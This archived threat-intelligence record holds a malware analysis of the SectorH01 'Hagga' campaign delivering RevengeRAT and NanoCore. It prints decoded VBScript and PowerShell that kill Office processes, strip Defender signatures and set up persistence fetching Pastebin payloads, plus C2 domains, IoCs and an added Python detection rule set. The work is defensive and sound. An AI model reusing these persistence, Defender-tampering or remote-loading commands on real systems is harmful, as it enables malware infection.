{
	"id": "712ff0fc-e931-40f9-bc34-299b70a12075",
	"created_at": "2026-04-06T00:13:19.833835Z",
	"updated_at": "2026-04-10T13:11:50.491044Z",
	"deleted_at": null,
	"sha1_hash": "09e383b509c553ec6a6f664345bb85d4d3ba51ca",
	"title": "Hagga of SectorH01 continues abusing Bitly, Blogger and Pastebin to deliver RevengeRAT and NanoCore – Red Alert",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1325563,
	"plain_text": "Hagga of SectorH01 continues abusing Bitly, Blogger and Pastebin to deliver RevengeRAT and NanoCore – Red Alert\r\nArchived: 2026-04-05 18:31:35 UTC\r\nOverview\r\n“Hagga” is the username of a Pastebin account used since December 2018 by a pervasive, known group of threat actors which targets thousands of users around the world, both for cyber espionage and for cyber crime, using malspam. Their activities were first discovered in 2017, and the ThreatRecon Team tracks both this group and the members behind “Hagga” collectively as the SectorH01 group.\r\nSince their activities were first discovered, they have been observed using a variety of commodity malware, spread from the same hosts and communicating with the same C2 addresses. The commodity malware used in the past includes RevengeRAT and NanoCore, both of which they are still using today.\r\nSectorH01 Group Attack Lifecycle\r\nTheir Targeting\r\nSectors the SectorH01 group has been observed targeting since discovery, likely for criminal purposes:\r\nAgriculture\r\nFood\r\nHospitality\r\nManufacturing\r\nNews Media\r\nShipping\r\nTourism\r\nTrade\r\nCountries the SectorH01 group has been observed targeting for this event:\r\nUnited States\r\nUnited Kingdom\r\nLatvia\r\nFrance\r\nGermany\r\nIndia\r\nJapan\r\nSouth Korea\r\nTaiwan\r\nThailand\r\nTurkey\r\nVietnam\r\nThe malware in this blog post appears to have been used only for criminal activities from June to September, targeting enterprise users, the majority of whom are based in the United States.\r\nThe Phish\r\nhttps://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/\r\nPage 1 of 9\r\nSectorH01 group sends phishing emails to their targets with subjects related to payments, such as purchase orders, invoices, requests for quotation, telegraphic transfer confirmation documents, or overdue payments. 
In these emails, they attach file(s) related to the email contents in the form of Excel XLS, Microsoft Word DOC/DOCX, RTF, and ZIP files.\r\nSample Excel File (b4fdff7dbed8724bde2c097285ce5842373a3d5087f0d492479e62b48e3e5e2d)\r\nIn the case of Excel XLS files, they have in recent months been using simple obfuscated VBA macros which execute mshta.exe against a Bitly-shortened link that redirects to a Google Blogger (blogspot) page.\r\nVBA Macro which executes mshta.exe embedded in malicious XLS file\r\nThe Blogger page looks benign but has obfuscated JavaScript hidden in its source code. This pattern of obfuscating JavaScript code is used extensively not only on the Blogger page but also on Pastebin, where the code is obfuscated over multiple layers and eventually decodes to various VBScript scripts which are run by the mshta.exe utility.\r\nSectorH01 commonly uses multiple layers of the same encoding for its Pastebin scripts\r\nBy performing the same decoding on the JavaScript code, we get the VBScript, which performs multiple tasks such as terminating processes and setting persistence.\r\nExample Decoded Script\r\n\u003cscript language=\"VBScript\"\u003e\r\n' Kill the Office processes that opened the lure document\r\nSet X7W832DSA = CreateObject(StrReverse(StrReverse(\"WScript.Shell\")))\r\nDim ASSd712ji8asd\r\nASSd712ji8asd = \"cmd.exe /c taskkill /f /im winword.exe \u0026 taskkill /f /im excel.exe \u0026 taskkill /f /im MSPUB.exe \u0026 taskkill\r\nX7W832DSA.Run ASSd712ji8asd, vbHide\r\n' Run-key persistence: mshta.exe re-fetches a Pastebin paste at every logon\r\nSet X_ws = CreateObject(\"WScript.Shell\")\r\nPa_2da = \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WinUpdate\"\r\nX_ws.RegWrite Pa_2da,\"mshta.exe http://pastebin.com/raw/2gY9SAwU\",\"REG_EXPAND_SZ\"\r\n' Scheduled-task persistence every 30 minutes; the command is built from a reversed literal plus single characters\r\nSet Mi_G = CreateObject(StrReverse(StrReverse(\"WScript.Shell\")))\r\nDim X_hw\r\nX_hw0 = StrReverse(\"t/ 03 om/ ETUNIM cs/ etaerc/ sksathcs\")\r\nX_hw1 = \"n \"\"Avast Updater\"\" /tr \"\"mshta.ex\"\r\nX_hw2 = \"e h\" + \"t\" + \"t\" + \"p\" + \":\" + \"/\" + \"/\" + \"p\" + \"a\" + \"s\" + \"t\" + \"e\" + \"b\" + \"i\" + \"n\" + \".\" + \"c\" + \"o\" + \"m\"\r\nX_hw = X_hw0 + X_hw1 + X_hw2\r\nMi_G.Run X_hw, vbHide\r\n' Second scheduled task, every 300 minutes, with the same construction\r\nSet Ox_xw = CreateObject(StrReverse(StrReverse(\"WScript.Shell\")))\r\nDim P_wx\r\nP_wx0 = StrReverse(\"t/ 003 om/ ETUNIM cs/ etaerc/ sksathcs\")\r\nP_wx1 = \"n \"\"Avast backup\"\" /tr \"\"mshta.ex\"\r\nP_wx2 = \"e h\" + \"t\" + \"t\" + \"p\" + \":\" + \"/\" + \"/\" + \"p\" + \"a\" + \"s\" + \"t\" + \"e\" + \"b\" + \"i\" + \"n\" + \".\" + \"c\" + \"o\" + \"m\"\r\nP_wx = P_wx0 + P_wx1 + P_wx2\r\nOx_xw.Run P_wx, vbHide\r\nself.close\r\n\u003c/script\u003e\r\nGoing into one of the scheduled tasks, we see more encoded text.\r\nExample First-Layer Decoded Scheduled Task\r\n\u003cscript language=\"VBScript\"\u003e\r\nSet EAsxw = CreateObject(StrReverse(\"llehS.tpircSW\"))\r\nDim Xsks\r\n' Reversed PowerShell one-liner that rebuilds code from decimal character codes and pipes it to IEX\r\nXsks = StrReverse(\"XEI|)OLOL$(gnirtSteG.IICSA::]gnidocnE.txeT.metsyS[;)14,201,63,44,93,101,021,101,64,001,801,501,711,66,3\r\n' The command is spelled out one (reversed) character at a time\r\nX_WRc = StrReverse(\"P\") + StrReverse(\"o\") + StrReverse(\"w\") + StrReverse(StrReverse(StrReverse(StrReverse(\"e\")))) + StrRev\r\nEAsxw.Run X_WRc, vbHide\r\nself.close\r\n\u003c/script\u003e\r\nFinally, further decoding shows it loading different malware from two Pastebin pastes, which are again obfuscated.\r\nExample Second-Layer Decoded Scheduled Task\r\n[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]\r\nAt other times, the decoded scripts make use of .NET Reflection.\r\nExample of .NET Reflection in Decoded Script\r\ndo {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);[void] [System.Reflection.Assembly]::LoadWith\r\nAfter looking at the various scripts used, we observed this obfuscated JavaScript code mainly serving one or more of these purposes:\r\nTerminating Microsoft Office processes winword.exe, excel.exe, MSPUB.exe, POWERPNT.exe, and sometimes Windows Defender processes MSASCuiL.exe and MpCmdRun.exe\r\nInterfering with Windows Defender via command \"MpCmdRun.exe 
-removedefinitions -dynamicsignatures\"\r\nSetting Registry Autorun persistence to execute mshta.exe on a Pastebin URL\r\nSetting Scheduled Task persistence to execute mshta.exe on a Pastebin URL\r\nExecuting malware in memory, sometimes in Microsoft’s .NET MSBuild.exe\r\nIn most cases, SectorH01 group in fact performed all of the above, sometimes stacking multiple Pastebin URLs and multiple commands in a single URL. Moreover, since SectorH01 group is using the “Hagga” Pastebin account, which has the ability to edit the user’s pastes, they at times modify a paste to perform different actions. Below is the attack flow using this sample Excel file as an example.\r\nSite: www[.]bitly[.]com/adsodeasda\r\nAction: Redirect to https://xasjow21d[.]blogspot.com/p/14[.]html\r\nSite: https://xasjow21d[.]blogspot.com/p/14[.]html\r\nAction: mshta.exe http://www[.]pastebin[.]com/raw/8uJavttD\r\nSite: http://www[.]pastebin[.]com/raw/8uJavttD\r\nActions:\r\n(1) MpCmdRun.exe -removedefinitions -dynamicsignatures\r\n(2) taskkill winword.exe / excel.exe / MSPUB.exe / POWERPNT.exe / MSASCuiL.exe / MpCmdRun.exe\r\n(3) Run https://pastebin[.]com/raw/7EdE Euebh via PowerShell\r\n(4) Run http://pastebin[.]com/raw/ri21rHbF via mshta.exe\r\nSite: http://pastebin[.]com/raw/ri21rHbF\r\nAction: Deobfuscates to RevengeRAT (CF6293824C97C45680CF999955FD48801856B424DC6E3CEAC6D5E36BB4092856)\r\nSite: http://pastebin[.]com/raw/ri21rHbF [Paste Edit 1]\r\nActions:\r\n(1) taskkill winword.exe / excel.exe / MSPUB.exe / POWERPNT.exe\r\n(2) Set Registry Autorun persistence to execute mshta.exe http://pastebin[.]com/raw/2gY9SAwU\r\n(3) Set Scheduled Task persistence to execute mshta.exe http://pastebin[.]com/raw/qZXnhtQG\r\n(4) Set Scheduled Task persistence to execute mshta.exe http://pastebin[.]com/raw/Htp0LKHg\r\nSite: http://pastebin[.]com/raw/ri21rHbF [Paste Edit 2]\r\nActions:\r\n(1) ping Google\r\n(2) Run https://pastebin[.]com/raw/QppWFhGC via Reflection\r\n(3) Run https://pastebin[.]com/raw/Q8g1d6Be replace(')\u0026*^','0x') via Reflection\r\nSite: http://pastebin[.]com/raw/2gY9SAwU\r\nAction: Self.close()\r\nSite: http://pastebin[.]com/raw/qZXnhtQG\r\nActions:\r\n(1) Execute https://pastebin[.]com/raw/13AGuyHY via Reflection\r\n(2) Execute k.Hackitup() in https://pastebin[.]com/raw/0e5uVXL0 replace('#@!','0x') via Reflection\r\nSite: http://pastebin[.]com/raw/Htp0LKHg\r\nAction: Self.close()\r\nSite: https://pastebin[.]com/raw/QppWFhGC\r\nAction: Deobfuscates to a code injector (E22D550423F05EB685AD060A71D58B306E31C473D2D0CACF5794EC424FD3F393), obfuscated with ConfuserEx\r\nSite: https://pastebin[.]com/raw/Q8g1d6Be\r\nAction: Deobfuscates to NanoCore (E841F0008D9DA41CD815F75657D305DD69FC169C64FA283BF62DECD02B3D931E), obfuscated with Eazfuscator\r\nSite: https://pastebin[.]com/raw/13AGuyHY\r\nAction: Deobfuscates to a code injector (84833991F1705A01A11149C9D037C8379A9C2D463DC30A2FEC27BFA52D218FA6), obfuscated with ConfuserEx\r\nSite: https://pastebin[.]com/raw/0e5uVXL0\r\nAction: Deobfuscates to NanoCore (94B7C5C65637D33F031F1173A68C1D008DD948B6CCBAE42682F82A56D3CF6197), obfuscated with Eazfuscator\r\nUsage of bit.ly, blogspot and pastebin allows SectorH01 group to be less traceable on the infrastructure side, but it is because of this that we know their pastes center around the “hagga” user these days. As long as Pastebin tolerates this user, they are likely to continue using the account, because Pastebin Pro accounts are no longer for sale.\r\nBut as pastes can easily be removed in response to abuse reports, the SectorH01 group hedges this risk by connecting to multiple unlisted pastes. 
We see the same hedging on their target endpoints, where they put in place multiple layers of persistence, use more than one type of RAT at the initial stage, and connect to multiple servers.\r\nRevengeRAT\r\nRevengeRAT is a RAT whose builder and source code are publicly available. This sample is set to use the C2 address ontothenextone[.]duckdns[.]org.\r\nSome of the configuration settings of this RevengeRAT variant\r\nRevengeRAT uses Base64 encoding for its C2 traffic, so this information is easily decoded. From the configuration settings, we see the key variable “Revenge-RAT” and the SPL variable “-]NK[-”, both of which are used as delimiters between the Base64-encoded fields.\r\nInformation sent to the C2 in a past packet capture of this sample, which can be easily decoded\r\nNanoCore\r\nNanoCore is a RAT which was available for sale from 2014 to 2016 and has been leaked over the years. While the developer of NanoCore was arrested and sentenced in 2018, the RAT is still used by attackers.\r\nIn this case, the two NanoCore samples we found encoded in Pastebin pastes attempted to connect to the C2 addresses attilabanks[.]ddns[.]net and yakka[.]duckdns[.]org. The C2 traffic of NanoCore is known to use the DES algorithm for encryption.\r\nSummary\r\nSectorH01 is a threat group which in most cases targets enterprise users seemingly indiscriminately; even when they target for espionage, their TTPs have been known to stay fairly constant. They remain brazen in their attacks. Although we see a slight improvement in their operational security, they still use relatively simple tricks such as macros and known, detected RATs (run in memory only), and they connect to domains such as Pastebin and dynamic DNS services, which should raise red flags or at least questions. 
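Each of the behaviours in the purposes list above leaves a trace in process-creation or registry telemetry, and the attack-flow table gives the concrete command lines to match on. The Python below is an added example, not code from the ThreatRecon post: a small rule set run over constructed events that replay the table (its URLs refanged) plus one benign mshta.exe launch of a local HTA that must not fire. The event layout, rule names, helpers and sample events are this example's own; the process names, registry path and URLs are the page's. It generalises slightly beyond the table by matching any bit.ly, Blogger or Pastebin host in an mshta.exe command line rather than the specific pastes listed.

```python
# Added example, not code from the ThreatRecon post: a rule set that scores
# simplified process-creation and registry events for the SectorH01
# behaviours described above.  The event layout is a constructed stand-in for
# Sysmon/EDR fields; rule names, helpers and sample events are this example's
# own, while the process names, URLs and registry path come from the page.
BS = chr(92)  # a literal backslash, used to spell out Windows paths below

PASTE_HOSTS = ('pastebin.com', 'blogspot.com', 'bit.ly', 'bitly.com')
OFFICE = ('winword.exe', 'excel.exe', 'powerpnt.exe', 'mspub.exe')
DEFENDER = ('msascuil.exe', 'mpcmdrun.exe')
RUN_KEY = 'currentversion' + BS + 'run' + BS

def basename(path):
    '''Lower-cased last component of a Windows or POSIX path.'''
    return path.replace(BS, '/').rsplit('/', 1)[-1].lower()

def check_event(ev):
    '''Return the names of every rule that matches one telemetry event.'''
    hits = []
    if ev.get('type') == 'process':
        image = basename(ev.get('image', ''))
        parent = basename(ev.get('parent', ''))
        cmd = ev.get('cmdline', '').lower()
        if image == 'mshta.exe':
            if any(host in cmd for host in PASTE_HOSTS):
                hits.append('mshta_fetches_paste_site')  # stage pulled from bit.ly/Blogger/Pastebin
            if parent in OFFICE:
                hits.append('office_spawns_mshta')  # the XLS macro launching mshta.exe
        if image == 'schtasks.exe' and '/create' in cmd and 'mshta' in cmd:
            hits.append('schtasks_persists_mshta')
        if 'taskkill' in cmd and any(p in cmd for p in OFFICE + DEFENDER):
            hits.append('taskkill_office_or_defender')  # also covers cmd.exe /c taskkill chains
        if image == 'mpcmdrun.exe' and '-removedefinitions' in cmd:
            hits.append('defender_definitions_removed')
    elif ev.get('type') == 'registry':
        target = ev.get('target', '').lower()
        if RUN_KEY in target and 'mshta' in ev.get('details', '').lower():
            hits.append('run_key_persists_mshta')
    return hits

def scan(events):
    '''Run every event through the rules and return (event index, rule) pairs.'''
    return [(i, rule) for i, ev in enumerate(events) for rule in check_event(ev)]

SYS32 = 'C:' + BS + 'Windows' + BS + 'System32' + BS
OFFICE16 = 'C:' + BS + 'Program Files' + BS + 'Microsoft Office' + BS + 'root' + BS + 'Office16' + BS

# Constructed telemetry replaying the attack-flow table above (URLs refanged),
# followed by one benign mshta.exe launch that must not fire.
SAMPLE_EVENTS = [
    {'type': 'process', 'parent': OFFICE16 + 'EXCEL.EXE', 'image': SYS32 + 'mshta.exe',
     'cmdline': 'mshta.exe http://www.bitly.com/adsodeasda'},
    {'type': 'process', 'parent': SYS32 + 'mshta.exe', 'image': SYS32 + 'cmd.exe',
     'cmdline': 'cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe'},
    {'type': 'process', 'parent': SYS32 + 'mshta.exe', 'image': SYS32 + 'schtasks.exe',
     'cmdline': 'schtasks /create /sc MINUTE /mo 30 /tn \"Avast Updater\" /tr \"mshta.exe http://pastebin.com/raw/qZXnhtQG\"'},
    {'type': 'registry', 'image': SYS32 + 'mshta.exe',
     'target': 'HKCU' + BS + 'Software' + BS + 'Microsoft' + BS + 'Windows' + BS + 'CurrentVersion' + BS + 'Run' + BS + 'WinUpdate',
     'details': 'mshta.exe http://pastebin.com/raw/2gY9SAwU'},
    {'type': 'process', 'parent': SYS32 + 'mshta.exe',
     'image': 'C:' + BS + 'Program Files' + BS + 'Windows Defender' + BS + 'MpCmdRun.exe',
     'cmdline': 'MpCmdRun.exe -removedefinitions -dynamicsignatures'},
    {'type': 'process', 'parent': 'C:' + BS + 'Windows' + BS + 'explorer.exe', 'image': SYS32 + 'mshta.exe',
     'cmdline': 'mshta.exe C:' + BS + 'Tools' + BS + 'inventory.hta'},
]
```

scan(SAMPLE_EVENTS) returns six (index, rule) pairs for the first five events and nothing for the Explorer-launched HTA. The rules key on parent/child relationships and command-line content rather than on paste identifiers, because the “Hagga” account edits pastes in place and new ones appear faster than any blocklist can follow.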
All of these should be opportunities for organizations to detect the SectorH01 group.\r\nIndicators of Compromise (IoCs)\r\nMalicious Documents (SHA-256)\r\nb4fdff7dbed8724bde2c097285ce5842373a3d5087f0d492479e62b48e3e5e2d\r\nc763340ae4acecd3e7d85b118bbad6bb4b1d433a6398571afd4c2c27a304ab4e\r\ne83304a5ae3e6ef366858c48aa8706d8e088aba86c724d575b4ad2e0ebaea7cd\r\nd757406ae30d7822ebe63c28ff09ac7b1eca1a0e37e6f706c442f4f7517a624b\r\n399b7823b707ac07c65940a30e85bdf5c0c7ed1bba5b5034ebcf189937636a44\r\nRevengeRAT (SHA-256)\r\nCF6293824C97C45680CF999955FD48801856B424DC6E3CEAC6D5E36BB4092856\r\nNanoCore (SHA-256)\r\n94B7C5C65637D33F031F1173A68C1D008DD948B6CCBAE42682F82A56D3CF6197\r\nE841F0008D9DA41CD815F75657D305DD69FC169C64FA283BF62DECD02B3D931E\r\nCode Injectors (SHA-256)\r\n84833991F1705A01A11149C9D037C8379A9C2D463DC30A2FEC27BFA52D218FA6\r\nE22D550423F05EB685AD060A71D58B306E31C473D2D0CACF5794EC424FD3F393\r\nC2 Domains\r\nontothenextone[.]duckdns[.]org\r\nhaggapaggawagga[.]duckdns[.]org\r\nattilabanks[.]ddns[.]net\r\nyakka[.]duckdns[.]org\r\nAbused Legitimate Services\r\nbitly[.]com/aswoesx2yxwxxd\r\nbitly[.]com/adsodeasda\r\nbitly[.]com/uiQSQWSQWSNnase\r\nbitly[.]com/aswoeosXxxwxhh\r\nxaasxasxasx[.]blogspot[.]com/p/kudi[.]html\r\nxasjow21d[.]blogspot[.]com/p/14[.]html\r\naxxwnxiaxs[.]blogspot[.]com/p/13[.]html\r\npastebin[.]com/raw/wZSPpxaG\r\npastebin[.]com/raw/2gY9SAwU\r\npastebin[.]com/raw/qZXnhtQG\r\npastebin[.]com/raw/Htp0LKHg\r\npastebin[.]com/raw/13AGuyHY\r\npastebin[.]com/raw/0e5uVXL0\r\npastebin[.]com/raw/8uJavttD\r\npastebin[.]com/raw/7EdEuebH\r\npastebin[.]com/raw/ri21rHbF\r\npastebin[.]com/raw/QppWFhGC\r\npastebin[.]com/raw/Q8g1d6Be\r\npastebin[.]com/raw/VpKuzs3R\r\npastebin[.]com/raw/kqm60tX5\r\npastebin[.]com/raw/3pEVfu9k\r\npastebin[.]com/raw/3VNZw83B\r\npastebin[.]com/raw/8Q050Drg\r\npastebin[.]com/raw/jX4MuzmX\r\nMITRE ATT\u0026CK Techniques\r\nThe following is 
a list of MITRE ATT\u0026CK Techniques we have observed based on our analysis of these and other related malware.\r\nInitial Access\r\nT1193 Spearphishing Attachment\r\nExecution\r\nT1059 Command-Line Interface\r\nT1173 Dynamic Data Exchange\r\nT1106 Execution through API\r\nT1203 Exploitation for Client Execution\r\nT1170 Mshta\r\nT1086 PowerShell\r\nT1053 Scheduled Task\r\nT1064 Scripting\r\nT1204 User Execution\r\nPersistence\r\nT1108 Redundant Access\r\nT1060 Registry Run Keys / Startup Folder\r\nT1053 Scheduled Task\r\nDefense Evasion\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1089 Disabling Security Tools\r\nT1054 Indicator Blocking\r\nT1202 Indirect Command Execution\r\nT1112 Modify Registry\r\nT1170 Mshta\r\nT1045 Software Packing\r\nT1055 Process Injection\r\nT1064 Scripting\r\nT1108 Redundant Access\r\nT1102 Web Service\r\nCredential Access\r\nT1056 Input Capture\r\nT1081 Credentials in Files\r\nT1214 Credentials in Registry\r\nDiscovery\r\nT1016 System Network Configuration Discovery\r\nT1033 System Owner/User Discovery\r\nT1057 Process Discovery\r\nT1063 Security Software Discovery\r\nT1082 System Information Discovery\r\nT1083 File and Directory Discovery\r\nCollection\r\nT1056 Input Capture\r\nT1123 Audio Capture\r\nT1125 Video Capture\r\nCommand and Control\r\nT1032 Standard Cryptographic Protocol\r\nT1065 Uncommonly Used Port\r\nT1094 Custom Command and Control Protocol\r\nT1105 Remote File Copy\r\nT1132 Data Encoding\r\nExfiltration\r\nT1022 Data Encrypted\r\nT1041 Exfiltration Over Command and Control Channel\r\nSource: https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/"
	],
	"report_names": [
		"sectorh01-continues-abusing-web-services"
	],
	"threat_actors": [
		{
			"id": "28851008-77b4-47eb-abcd-1bb5b3f19fc2",
			"created_at": "2023-06-20T02:02:10.254614Z",
			"updated_at": "2026-04-10T02:00:03.365336Z",
			"deleted_at": null,
			"main_name": "Hagga",
			"aliases": [
				"TH-157",
				"Aggah"
			],
			"source_name": "MISPGALAXY:Hagga",
			"tools": [
				"Agent Tesla"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434399,
	"ts_updated_at": 1775826710,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/09e383b509c553ec6a6f664345bb85d4d3ba51ca.pdf",
		"text": "https://archive.orkl.eu/09e383b509c553ec6a6f664345bb85d4d3ba51ca.txt",
		"img": "https://archive.orkl.eu/09e383b509c553ec6a6f664345bb85d4d3ba51ca.jpg"
	}
}